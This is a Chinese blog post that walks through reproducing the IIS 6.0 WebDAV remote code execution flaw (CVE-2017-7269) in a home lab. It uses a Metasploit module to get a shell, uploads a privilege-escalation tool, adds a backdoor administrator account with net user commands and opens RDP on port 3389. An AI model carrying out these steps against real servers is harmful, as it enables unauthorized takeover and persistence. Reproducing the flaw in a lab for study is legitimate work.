iis6.0远程代码执行漏洞

最新推荐文章于 2024-04-04 20:00:00 发布
最新推荐文章于 2024-04-04 20:00:00 发布
阅读量3.4k 收藏 3
点赞数 1
文章标签: web安全 安全 iis 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/G208_522/article/details/121447868
版权

iis6.0远程代码执行漏洞

1、实验环境搭建

目标主机Windows server2003 sp2

img

2、目标服务器需要在IIS里面开启WebDAV

img

3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址)

Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址)

4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下:
注:exp为资源包,可自行下载,稍后上传到csdn

https://download.csdn.net/download/G208_522/46134521

img

kali中启动Msfconsole,使用CVE-2017-7269攻击插件

输入:msfconsole启动metasploit

5、然后reload_all****重启****加载exp。

img

6、use exploit/windows/iis/cve_2017_7269。

img

7、使用show options查看相关参数。

img

8、设置目标主机,http主机,以及返回载荷。

img

9、设置完成,exploit

img

10、输入shell查看目前接入权限

img

11、进入C盘

img

12、使用md命令创建123文件夹

img

使用dir命令查看,以及存在123文件夹

img

13、使用IIS6.exe提权

输入exit退出至msf命令模式下 img

使用upload命令上传IIS6.exe以及3389.bat文件至win2003 C盘下123文件夹。

img

img

14、输入shell进入2003系统,使用提权工具,查看当前权限。

img

创建用户

IIS6.0.exe “net user zhangsan 123456 /add”

把张三加入到管理员组

IIS6.0.exe “net localgroup Administrators zhangsan /add”

img

查看系统是否开启3389端口。

img

使用iis6.exe 执行上传的3389.bat文件。

img

3389端口已经打开。

我们使用zhangsan用户进行远程连接。

打开win10下远程桌面(快捷命令为mstsc)

img

img

img

img

img

高小白—专业摸鱼
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 5446
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exe、iiswrite等工具。
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6206
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
中间件安全IIS----文件解析漏洞利用
最新发布
Karka_的博客
04-04 869
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。接下来,为服务器开启ASP解析功能,这是所有ASP网站都必须启用的。
ASP IIS中间件-CVE-2015-1635
尘玥的故事
05-25 330
远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8924
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
http.sys远程代码执行漏洞(MS15-034)
weixin_34307464的博客
08-06 777
0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 0x0...
iis6远程代码执行漏洞.zip
11-21
iis6远程代码执行漏洞.zip
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-02
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
cve_2017_7269.rb
04-11
IIS6.0远程代码执行漏洞,本文件需要配合MSF使用,使用前把文件放在//usr/share/metasploit-framework/modules/exploits/windows/iis/下
IIS6.0文件解析漏洞–特殊符号“/“ && IIS6.0文件解析漏洞–特殊符号“;“
m0_73720136的博客
05-07 449
掌握利用IIS6.0文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用IIS6.0文件解析漏洞,绕过白名单限制,解析脚本文件。
中间件解析漏洞 - IIS6.0
qq_49433473的博客
05-18 1847
中间件解析漏洞 - IIS6.0 —(文件上传之IIS6.0解析漏洞
IIS 6.0远程代码执行漏洞 安全狗可拦截
weixin_33738982的博客
07-05 151
IIS 6.0 被曝出远程 0day,目前已经出现远程利用代码,针对 windows server 2003可以稳定利用,可以远程执行任意代码。 据报告称去年七月起就有攻击者开始利用。建议大家通过扫描检查相关业务系统,并增加 waf 规则或禁用 webdav 特性。 漏洞描述:微软方面也已经确认了该漏洞:Windows Server 2003R2版本...
Windows 2003 Server远程代码执行漏洞集合
weixin_44110913的博客
06-15 1049
目录 MS08-067 CVE-2017-7269 MS08-067 发布日期:2008/10/22 针对端口:139、445 漏洞等级:高危 漏洞影响:服务器服务中的漏洞可能允许远程执行代码 受影响的操作系统: Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta 漏洞原理:攻击者通过特制的RPC请求发给存在漏洞的主机,将可导致攻击者远程代码执行。攻击者可...
iis6.0远程代码执行漏洞复现
shatianyzg的博客
06-12 570
iis6.0远程代码执行漏洞复现(CVE-2017-7269) 实验环境搭建 1.目标机:windows server 2003 r2 需要目标服务器开启WebDAV 靶机IP:192.168.75.134 Kali IP : 192.168.75.129 kali中启动Msf,使用CVE-2017-7269攻击插件 use exploit/windows/iis/cve_2017_7269 没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下
IIS写权限漏洞 (HTTP PUT方法利用)
dieman0446的博客
12-02 823
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。 具体的原理在这个链接里。 http://www.2cto.com/Article/201307/228165.html 这个帖子是以前在法客里...
iis6.0远程代码执行(CVE-2017-7269)
qq115399231的博客
08-06 883
环境搭建 使用windows server 2003 R2 下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图) 这里我加了个默认页面 配置iis服务 测试环境准备就绪 window server 2003(靶机):192.168.162.132 kali(攻击机):192.168.162.128 EXP利用 下载 把exp 复制到kali攻击机器的/usr/s...
Metasploit复现 IIS6.0远程溢出漏洞
土豆回锅的博客
01-24 3927
漏洞描述 开启WebDAV服务对IIS 6.0存在缓冲区溢出漏洞都可以导致远程代码执行,所以对于目前的IIS 6.0用户而言,可用的变通方案就是关闭WebDAV服务。 漏洞编号 CVE-2017-7269 漏洞等级 高危 影响产品 Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0 漏洞环境搭建 我的环境是windows 20
IIS 6.0 WebDAV远程代码执行0day漏洞 CVE-2017-7269 PoC已经公开了 但Windows 2003已经没有更新服务了...
weixin_34301132的博客
09-01 710
3月27日,在Windows 2003 R2上使用IIS 6.0 爆出了0Day漏洞(CVE-2017-7269,CNNVD-201703-1151),PoC开始流传,但糟糕的是这产品已经停止更新了,建议大家要么关闭IIS 下的WebDAV服务,要么升级到Windows 2016。绿盟科技发布威胁预警通告,全文如下。 Update:绿盟科技已经发布了该...
iis远程代码执行漏洞
05-15
然而,IIS也存在一些安全漏洞,其中包括远程代码执行漏洞远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者可以通过远程方式在目标服务器上执行任意代码,从而控制受害者服务器。IIS远程代码执行漏洞是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值